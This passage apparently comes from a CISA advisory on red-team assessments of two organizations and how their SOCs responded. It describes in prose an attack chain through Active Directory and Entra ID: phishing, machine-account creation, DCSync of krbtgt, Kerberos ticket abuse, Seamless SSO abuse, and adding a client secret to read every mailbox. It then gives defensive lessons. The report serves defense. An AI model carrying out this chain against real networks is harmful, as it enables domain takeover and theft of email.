&lt;p&gt;The organization did not respond effectively to red team activity. The red team observed this during their engagement by accessing SOC personnel emails and moving laterally to SOC workstations where they captured screenshots [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1113/&quot; target=&quot;_blank&quot; title=&quot;T1113&quot;&gt;T1113&lt;/a&gt;], used keyloggers [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1056/001/&quot; target=&quot;_blank&quot; title=&quot;T1056.001&quot;&gt;T1056.001&lt;/a&gt;], and retrieved Microsoft Teams messages [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1213/005/&quot; target=&quot;_blank&quot; title=&quot;T1213.005&quot;&gt;T1213.005&lt;/a&gt;].&lt;/p&gt;
&lt;p&gt;The red team observed that the SOC received medium- and low-severity EDR alerts related to the red team activity but did not respond to them. Thousands of false positive alerts corresponding to normal business operations, many with a higher severity, obscured the alerts triggered by red team activity.&lt;/p&gt;
&lt;p&gt;Organizational silos further hindered detection and response. The organization had multiple SOCs and multiple EDR solutions. Staff did not communicate with staff from other SOCs or have visibility on their detection tools. SOC staff and system owners also did not communicate with each other.&lt;/p&gt;
&lt;p&gt;This led to SOC staff not actioning alerts from red team activity. For example, red team members noted chat exchanges regarding an SCCM in which defenders tried and failed to identify the system owner, its function, and its typical use. The SOC team eventually flagged the alert as a false positive.&lt;/p&gt;
&lt;p&gt;The red team believes this was because the SOC staff lacked standard operating procedures for escalating alerts and had limited personnel authority.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Organization B&lt;/strong&gt;&lt;/h3&gt;
&lt;h4&gt;&lt;strong&gt;Red Team Cyber Threat Activity&lt;/strong&gt;&lt;/h4&gt;
&lt;h5&gt;&lt;em&gt;&lt;strong&gt;Initial Access&lt;/strong&gt;&lt;/em&gt;&lt;/h5&gt;
&lt;p&gt;The CISA red team gained initial access to Organization B’s environment through a spearphishing campaign. The team gathered email addresses from public websites [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1589/002/&quot; target=&quot;_blank&quot; title=&quot;T1589.002&quot;&gt;T1589.002&lt;/a&gt;] and sent phishing emails that eventually led to three users clicking [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1204/&quot; target=&quot;_blank&quot; title=&quot;T1204&quot;&gt;T1204&lt;/a&gt;] on a malicious link, giving the red team access to three workstations.&lt;/p&gt;
&lt;p&gt;Each payload execution generated a medium-severity alert: “An executable file loaded an unexpected DLL file.” SOC staff triaged these alerts and manually isolated all three workstations within 10, 2, and 20 minutes. This effectively terminated the team’s command and control (C2) communications with the workstations. Before staff isolated one workstation, the red team enumerated Organization B’s domain’s AD structure by executing various Lightweight Directory Access Protocol (LDAP) queries through the callback. The data gathered included all users, groups, computers, domains, GPO, and subsequent relationships for the entire domain.&lt;/p&gt;
&lt;p&gt;Because the defenders removed their initial foothold, the red team switched to an assume breach model. Organization B’s TAs (organization IT staff who knew of the assessment and were in contact with the red team) executed a red-team-provided payload on a designated internal host. This host was associated with a standard user account with no administrative privileges, replicating the same level of access the red team would have maintained if Organization B’s defenders had not detected them.&lt;/p&gt;
&lt;h5&gt;&lt;em&gt;&lt;strong&gt;Domain Compromise&lt;/strong&gt;&lt;/em&gt;&lt;/h5&gt;
&lt;p&gt;With persistent access to the internal network, the red team searched for ways to escalate their privileges over the domain to facilitate lateral movement and access SBSs. The red team used the assume breach account to query the MAQ attribute of Organization B’s domain and discovered that all domain users were able to add accounts to the domain.&lt;/p&gt;
&lt;p&gt;The red team created a new machine account with a hostname designed to resemble a legitimate host. The creation of the machine account provided the red team with a domain account and a password that they controlled. This allowed them to execute standalone tools from a red-team-controlled Linux workstation. The tool’s traffic was proxied through the assume breach host, circumventing restrictions imposed by host-based EDR.&lt;/p&gt;
&lt;p&gt;The red team did not identify any escalation paths from the AD data; however, enumeration of SCCM distribution points led to the discovery of an XML file with cleartext credentials for a domain service account. AD data showed that the newly acquired service account had outbound object control over almost 1,000 accounts within the domain due to its group membership. Most notably, the service account had &lt;code&gt;AllExtendedRights&lt;/code&gt; permission over a domain controller, which enabled the team to conduct a resource-based constrained delegation attack, granting them DCSync privileges [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1003/006/&quot; target=&quot;_blank&quot; title=&quot;T1003.006&quot;&gt;T1003.006&lt;/a&gt;] and the ability to obtain AD account credentials. The team used these credentials throughout the remainder of their assessment to access servers and workstations. One of the first accounts the red team DCSynced was the &lt;code&gt;krbtgt&lt;/code&gt; account, which a malicious cyber actor could use to forge Golden Tickets that allow for impersonation of any user in Organization B’s domain.&lt;/p&gt;
&lt;h5&gt;&lt;em&gt;&lt;strong&gt;Post Exploitation&lt;/strong&gt;&lt;/em&gt;&lt;/h5&gt;
&lt;h6&gt;Sensitive Business Systems&lt;/h6&gt;
&lt;p&gt;The TAs provided the names of two SBSs, one of which the red team successfully compromised. To do this, the team reviewed previously collected BloodHound data and identified a user account with access to an SBS web server that allowed Kerberos authentication. Because the red team had already compromised the on-premises (on-prem) AD environment, they could impersonate this user to access the server.&lt;/p&gt;
&lt;p&gt;The team:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Used DCSync to acquire the user’s AES256 password hash.&lt;/li&gt;
&lt;li&gt;Used the password hash to request a Kerberos ticket-granting ticket (TGT) for the user.&lt;/li&gt;
&lt;li&gt;Used the TGT to request a Kerberos service ticket [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1558/&quot; target=&quot;_blank&quot; title=&quot;T1558&quot;&gt;T1558&lt;/a&gt;] for the web server’s service principal name (SPN).&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;After requesting the Kerberos service ticket, the red team imported it into a Windows virtual machine (VM) on their infrastructure. The red team configured their VM to proxy any traffic to Organization B’s network through a SOCKS proxy that tunneled traffic through a compromised host.&lt;/p&gt;
&lt;h6&gt;Operational Technology Network&lt;/h6&gt;
&lt;p&gt;The red team wanted to gain visibility of the OT network and identify OT network subnets. To do this, they first identified an IT workstation with Remote Desktop Protocol (RDP) files, including a file named &lt;code&gt;ics-[redacted]-org&lt;/code&gt;, signifying that the user likely had remote access to the OT network. The red team identified that the workstation had remote access to a bastion host. A bastion host—sometimes referred to as a jump box or jump server—is a specialized, highly secured system (often a server or dedicated workstation) that serves as the sole access point between a network segment (such as an internal IT network) and a protected internal network (like an OT environment).&lt;/p&gt;
&lt;p&gt;The red team gained access to this bastion host using File Transfer Protocol (FTP) credentials to log in over Secure Shell (SSH) [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1021/004/&quot; target=&quot;_blank&quot; title=&quot;T1021.004&quot;&gt;T1021.004&lt;/a&gt;]. At this point, they had visibility over the OT network.&lt;/p&gt;
&lt;p&gt;They attempted to gain a C2 session on the server by dropping several payload files on the host and executing them. However, the callback never reached red team infrastructure because the host blocked outbound internet connections. The payload execution triggered an alert that led SOC staff to quarantine the host.&lt;/p&gt;
&lt;h6&gt;Microsoft Entra Systems&lt;/h6&gt;
&lt;p&gt;The red team attempted to access Organization B’s cloud-based Entra ID infrastructure to find a way to move from on-prem AD to the cloud. Organization B had a hybrid environment, and user credentials automatically synchronized between on-prem AD and cloud Entra ID. Given this, the red team looked for the on-prem server responsible for synchronization.&lt;/p&gt;
&lt;p&gt;Entra ID Connect (formerly Azure AD Connect) sets up an on-prem account with the prefix&amp;nbsp;&lt;code&gt;MSOL_&lt;/code&gt; to synchronize credentials with Entra ID. The red team used the open source tool ADConnectDump&lt;a href=&quot;#Note4&quot;&gt;&lt;sup&gt;4&lt;/sup&gt;&lt;/a&gt;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt; to obtain cleartext credentials for the on-prem Microsoft Online (MSOL) account and the Entra ID account&amp;nbsp;&lt;code&gt;Sync_[redacted]&lt;/code&gt; [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1003&quot; target=&quot;_blank&quot; title=&quot;T1003&quot;&gt;T1003&lt;/a&gt;]. With cleartext credentials for&amp;nbsp;&lt;code&gt;Sync_[redacted]&lt;/code&gt;, the red team logged into the Azure portal.&amp;nbsp;&lt;code&gt;Sync_[redacted]&lt;/code&gt; was not intended for interactive logins and, in this case, did not have multifactor authentication (MFA) enabled. However, the red team used this account to obtain access tokens for use with AzureHound and ROADrecon to gather Entra ID data for Organization B’s tenant.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The red team obtained cleartext MSOL credentials and logged into the Azure portal because MSOL accounts used to have a large number of permissions; Microsoft has since removed these permissions. See Microsoft’s &lt;a href=&quot;https://techcommunity.microsoft.com/blog/microsoft-entra-blog/action-required-msonline-and-azuread-powershell-retirement---2025-info-and-resou/4364991&quot; target=&quot;_blank&quot; title=&quot;Action required: MSOnline and AzureAD PowerShell retirement - 2025 info and resources&quot;&gt;Action required: MSOnline and AzureAD PowerShell retirement - 2025 info and resources&lt;/a&gt; and &lt;a href=&quot;https://techcommunity.microsoft.com/blog/microsoft-entra-blog/important-update-deprecation-of-azure-ad-powershell-and-msonline-powershell-modu/4094536&quot; target=&quot;_blank&quot; title=&quot;Important update: Deprecation of Azure AD PowerShell and MSOnline PowerShell modules&quot;&gt;Important update: Deprecation of Azure AD PowerShell and MSOnline PowerShell modules&lt;/a&gt; for more information.&lt;/p&gt;
&lt;p&gt;The interactive login from &lt;code&gt;Sync_[redacted]&lt;/code&gt; triggered an automated alert from Microsoft, which sent the information to Organization B’s SOC staff, who then blocked the suspicious activity.&lt;/p&gt;
&lt;p&gt;The red team identified a computer account containing &lt;code&gt;AZURESSO&lt;/code&gt; in its name, located in the on-prem AD environment. This account is part of the Seamless SSO implementation and allows users to use Kerberos tickets as the first step in authenticating to Entra ID. To abuse Seamless SSO, the red team acquired encrypted credentials of a target user via DCSync and then used the Rubeus “asktgs” module to request service tickets used for SSO. The red team imported the service tickets to their workstation and proxied their traffic through Organization B’s network using a SOCKS proxy. This allowed them to browse to https://portal[.]azure[.]com, while using legitimate Kerberos tickets, and the traffic appeared to originate from a trusted IP address.&lt;/p&gt;
&lt;p&gt;This approach allowed the red team to gain access to Entra ID as any user synced to AD without the user’s cleartext password. However, they could only use Kerberos tickets for the first phase of the sign-in process. If a user was set up to use MFA, then Entra ID would prompt the red team for a second factor during the sign-in process. Therefore, the red team was only able to log into any Entra ID account that did not have MFA enabled, which seemed limited to service accounts. They reviewed the previously obtained Entra ID data and looked for applications that had excessive permissions and were accessible to AD-synced service accounts.&lt;/p&gt;
&lt;p&gt;The red team identified an application that had permission to read, write, and send emails for all users within Organization B’s tenant. The application was owned by an AD-Synced account that was disabled in AD. Using a compromised host in the on-prem environment, they re-enabled this account, DCSynced its credentials, and used the AES256 hash to request Kerberos tickets. The red team used the tickets to authenticate to Entra ID and were then able to add a client secret to the application. This gave them the ability to retrieve the emails of every user within Organization B’s environment from the public internet.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;Organization B’s Response&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;Organization B quickly triaged and responded to alerts after the red team gained initial access, effectively terminating the team’s C2 communications with the workstations and leading the red team to move to an assume breach model. These actions demonstrated a mature, proactive security posture and helped prevent wider compromise.&lt;/p&gt;
&lt;p&gt;When the red team gained access to a bastion host in the OT DMZ, Organization B had defensive controls that blocked outbound connections to red team infrastructure, and SOC staff quickly triaged and responded to an alert by isolating the host.&lt;/p&gt;
&lt;p&gt;When the red team logged into the organization’s Azure portal via a compromised account, it triggered an automated alert from Microsoft, which led the staff to block the suspicious account. In addition, Organization B had custom detections Entra ID Risky User Alerts for “Unfamiliar sign-in properties” and “Suspicious API traffic” that alerted to the AzureHound user agent and to accounts exceeding predefined request thresholds to the Microsoft Graph API.&lt;/p&gt;
&lt;p&gt;See &lt;a href=&quot;#Table1&quot;&gt;&lt;strong&gt;Table 1&lt;/strong&gt;&lt;/a&gt; for Organization B’s defensive measures and associated response.&lt;/p&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Table1&quot;&gt;&lt;em&gt;&lt;strong&gt;Table 1&lt;/strong&gt;&lt;/em&gt;&lt;/a&gt;&lt;em&gt;&lt;strong&gt;. Red Team Activity and Organization B SOC Response&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Red Team Activity&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Defensive Measure&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;SOC Response&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Outcome&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;C2 payload executed on a workstation.&lt;/td&gt;
&lt;td&gt;Payload execution generated a medium-severity alert.&lt;/td&gt;
&lt;td&gt;Staff quarantined workstation; staff analyzed and reimaged before putting workstation back online.&lt;/td&gt;
&lt;td&gt;Red team lost access to a workstation.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;C2 payload executed on a second workstation.&lt;/td&gt;
&lt;td&gt;Payload execution generated a medium-severity alert.&lt;/td&gt;
&lt;td&gt;Staff quarantined workstation; staff analyzed and reimaged before putting workstation back online.&lt;/td&gt;
&lt;td&gt;Red team lost access to a workstation.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;C2 payload executed on a third workstation.&lt;/td&gt;
&lt;td&gt;Payload execution generated a medium-severity alert.&lt;/td&gt;
&lt;td&gt;Staff quarantined workstation; staff analyzed and reimaged before putting workstation back online.&lt;/td&gt;
&lt;td&gt;Red team lost access to a workstation.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;C2 payload executed on bastion host in the OT DMZ.&lt;/td&gt;
&lt;td&gt;Payload execution generated alerts.&lt;/td&gt;
&lt;td&gt;Staff quarantined the host.&lt;/td&gt;
&lt;td&gt;Red team lost access to the host.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Used compromised Entra ID account to log into Azure.&lt;/td&gt;
&lt;td&gt;Automated alert from Microsoft.&lt;/td&gt;
&lt;td&gt;Staff blocked the account.&lt;/td&gt;
&lt;td&gt;Red team compromised a different account and accessed Entra ID by abusing Seamless SSO.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;Despite these strengths, Organization B had areas for improvement. The red team was eventually able to access Entra ID through a computer account that was part of the organization’s Seamless SSO implementation. The account did not have MFA and had overly permissive application permissions, indicating the need for more mature cloud security processes.&lt;/p&gt;
&lt;p&gt;Additionally, Organization B had excessive permissions and misconfigurations in AD and service accounts, which the red team leveraged for privilege escalation. This highlights the importance of regular audits and strict enforcement of least privilege principles. Organization B could improve credential hygiene, as the red team found credentials for OT systems stored in plaintext on jump servers. Finally, while segmentation and egress controls were effective, ongoing review and tightening of IT/OT connectivity and access architectures would reduce opportunities for lateral movement.&lt;/p&gt;
&lt;h2&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Lessons&quot;&gt;&lt;strong&gt;Lessons Learned&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;The red team identified lessons learned based on each organization’s response. Organization A and Organization B contrasted significantly in their ability to quickly identify and respond to red team activity. However, similar gaps in both organizations contributed to the red team’s compromise of their cloud systems.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Untuned Detection Tools Lead to Missed Threats&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Organization A did not tune their detection tools to reduce alert noise, leading to an unmanageable level of alerts for SOC staff to review and action. The same red team activity that triggered alerts and action for Organization B led to no response for Organization A because SOC staff did not identify the activity as potentially malicious amid the overwhelming volume of alerts. Organization B had an established baseline and a fine-tuned alert system, allowing defenders to effectively filter out routine business activity and false positives. As a result, anomalies stood out, enabling the SOC staff to quickly detect and respond to red team activity.&lt;/p&gt;
&lt;p&gt;Without well-defined baselines and alert filtering, false positives and routine alerts overwhelm defenders, obscuring real threats. Organizations that tune alerts to highlight anomalies and filter out normal business activity enable defenders to focus on genuine incidents and respond rapidly.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Organizational Silos and Bureaucratic Hurdles Prevent Effective Incident Response&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;In Organization A, lack of communication and visibility created by organizational silos (among multiple SOCs and between SOC staff and system owners) hindered effective incident response, resulting in missed opportunities for identification of a major breach.&lt;/p&gt;
&lt;p&gt;Bureaucratic barriers arose because SOC staff managed systems without understanding their authorities as responsibilities and authorities varied across network segments. They had no escalation procedures and so defaulted to a “wait and see” approach.&lt;/p&gt;
&lt;p&gt;In contrast, Organization B empowered its defenders to act decisively. Staff quickly triaged alerts, investigated root causes, identified misconfigurations, and coordinated remediation with engineering.&lt;/p&gt;
&lt;p&gt;Detection tools are only as effective as the people, processes, and procedures supporting them. SOC staff should not operate in silos and should have clear authority unhindered by bureaucracy to effectively contain and resolve incidents.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Organizations Underestimate Risks in Cloud Environments&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Both organizations underestimated the risks associated with cloud environments. They granted excessive permissions to cloud applications, allowing the red team to access cloud systems. They also lacked fully mature, defined processes for detecting and remediating compromise of cloud environments, allowing the red team to maintain access to cloud resources.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;Use of Long-Lived User Identity and Access Management Credentials&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;Organization A used long-lived static IAM user credentials that were set to never expire. If a malicious actor obtains them, they will have all the user permissions, potentially enabling persistent, unrestricted access to the cloud environment.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;Excessive Permissions&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;Both organizations lacked Conditional Access for workload identities. This feature extends Conditional Access beyond user accounts, covering non-human identities, such as applications. It allows organizations to broadly apply access policies to applications that control how and when the application is used to access resources. Instead, both organizations used broad application permissions for most apps, which the team was able to exploit for access to the environment. In both organizations, the team was able to exploit excessive permissions to read emails.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;Lack of Mature Remediation Processes for Tokens&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;Both organizations lacked processes for revoking compromised access/refresh tokens. Without a well-defined, efficient process for remediating and revoking access/refresh tokens following a cloud compromise, malicious cyber actors evicted from on-prem environments may still leverage cloud access to regain entry. Organizations should establish mature procedures to detect and remediate compromises of cloud environments to prevent malicious cyber actors from reestablishing access.&lt;/p&gt;
&lt;h2&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Issues&quot;&gt;&lt;strong&gt;Issues&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;The red team identified the following issues that contributed to their ability to maintain persistent access to Organization A and/or B and escalate privileges or move laterally:&lt;/p&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;&lt;strong&gt;Misconfigured ADCS templates&lt;/strong&gt;.&lt;br&gt;
&lt;ul type=&quot;circle&quot;&gt;
&lt;li&gt;In Organization A, the red team identified and exploited a certificate template with common template misconfiguration known as ESC1, an overly permissive certificate template where the &lt;code&gt;CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT&lt;/code&gt; flag is enabled and low-privileged users can request certificates. This allows malicious actors to impersonate users. See SpecterOp’s &lt;a href=&quot;https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf&quot; target=&quot;_blank&quot; title=&quot;Certified Pre-Owned: Abusing Active Directory Certificate Services&quot;&gt;Certified Pre-Owned: Abusing Active Directory Certificate Services&lt;/a&gt; for information about the ESC1 misconfiguration.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Workstations where MAQ was misconfigured&lt;/strong&gt;.&lt;br&gt;
&lt;ul type=&quot;circle&quot;&gt;
&lt;li&gt;In Organization A, the team gained access to a workstation where the MAQ was set to the default value of 10. This meant that unprivileged users could add up to 10 computer accounts to the domain.&lt;/li&gt;
&lt;li&gt;In Organization B, the MAQ was set to 1,000 for all domain users, allowing any user to create a large number of machine accounts.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Service accounts with excessive permissions&lt;/strong&gt;.&lt;br&gt;
&lt;ul type=&quot;circle&quot;&gt;
&lt;li&gt;In Organization B, the red team identified a domain service account with &lt;code&gt;AllExtendedRights&lt;/code&gt; permission over a domain controller. &lt;code&gt;AllExtendedRights&lt;/code&gt; enables malicious cyber actors to perform DCsync attacks and potentially impersonate any account in the domain, leading to full domain compromise.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cleartext credentials.&lt;/strong&gt;&lt;br&gt;
&lt;ul type=&quot;circle&quot;&gt;
&lt;li&gt;In Organization A, the red team found and used cleartext credentials to obtain administrative access to SBSs.&lt;/li&gt;
&lt;li&gt;In Organization B, the red team identified a cleartext password in an XML file for a domain service account.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Endpoint management systems that lacked additional security controls&lt;/strong&gt;.&lt;br&gt;
&lt;ul type=&quot;circle&quot;&gt;
&lt;li&gt;In Organization A, the red team moved laterally from the SCCM server to users’ workstations. SCCM and other endpoint configuration managers (e.g., Jamf, BigFix) have broad administrative reach and are Tier 0 assets. If compromised, Tier 0 assets provide malicious actors with powerful escalation paths and control over the enterprise.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The red team identified an additional issue that was not exploited during the assessment but could be exploited by malicious cyber actors:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;AD misconfigurations and user accounts with excessive permissions.&lt;/strong&gt;&lt;br&gt;
&lt;ul type=&quot;circle&quot;&gt;
&lt;li&gt;In Organization B, the red team discovered that standard user accounts were improperly assigned to privileged administrative groups within the AD.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;MITRE&quot;&gt;&lt;strong&gt;MITRE &lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;ATT&amp;amp;CK Tactics and Techniques&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;See &lt;a href=&quot;#Table2&quot;&gt;&lt;strong&gt;Table 2&lt;/strong&gt;&lt;/a&gt; to &lt;a href=&quot;#Table11&quot;&gt;&lt;strong&gt;Table 11&lt;/strong&gt;&lt;/a&gt; for all referenced threat actor tactics and techniques in this advisory. &amp;nbsp;For assistance with mapping malicious cyber activity to the MITRE ATT&amp;amp;CK framework, see CISA and MITRE ATT&amp;amp;CK’s &lt;a href=&quot;https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping&quot; title=&quot;Best Practices for MITRE ATT&amp;amp;CK Mapping&quot;&gt;Best Practices for MITRE ATT&amp;amp;CK Mapping&lt;/a&gt; and CISA’s &lt;a href=&quot;https://github.com/cisagov/Decider/&quot; target=&quot;_blank&quot; title=&quot;Decider Tool&quot;&gt;Decider Tool&lt;/a&gt;.&lt;/p&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Table2&quot;&gt;&lt;em&gt;&lt;strong&gt;Table 2&lt;/strong&gt;&lt;/em&gt;&lt;/a&gt;&lt;em&gt;&lt;strong&gt;. Reconnaissance&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Gather Victim Identity Information: Credentials&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1589/001/&quot; target=&quot;_blank&quot; title=&quot;T1589.001&quot;&gt;T1589.001&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The red team performed reconnaissance and identified a web application with default credentials.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gather Victim Identity Information: Email Addresses&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1589/002/&quot; target=&quot;_blank&quot; title=&quot;T1589.002&quot;&gt;T1589.002&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The red team performed reconnaissance and gathered employee email addresses from public websites.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;&lt;strong&gt;Table 3. Resource Development&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Obtain Capabilities: Tool&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1588/002/&quot; target=&quot;_blank&quot; title=&quot;T1588.002&quot;&gt;T1588.002&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The red team used publicly available tools, including AzureHound and ROADrecon.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;&lt;strong&gt;Table 4. Initial Access&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Phishing&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1566/&quot; target=&quot;_blank&quot; title=&quot;T1566&quot;&gt;T1566&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;p&gt;The red team gained initial access to four Organization A workstations by sending phishing emails from an internal email address.&lt;/p&gt;
&lt;p&gt;The red team gained initial access to three Organization B workstations via spearphishing emails that eventually led users to click on a malicious payload.&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;&lt;strong&gt;Table 5. Execution&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;User Execution&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1204/&quot; target=&quot;_blank&quot; title=&quot;T1204&quot;&gt;T1204&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The red team’s spearphishing emails eventually led to users clicking on a malicious payload.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;&lt;strong&gt;Table 6. Persistence&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Create Account: Domain Account&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1136/002/&quot; target=&quot;_blank&quot;&gt;T1136.002&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The red team exploited misconfigured MAQs to create machine accounts on a workstation.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
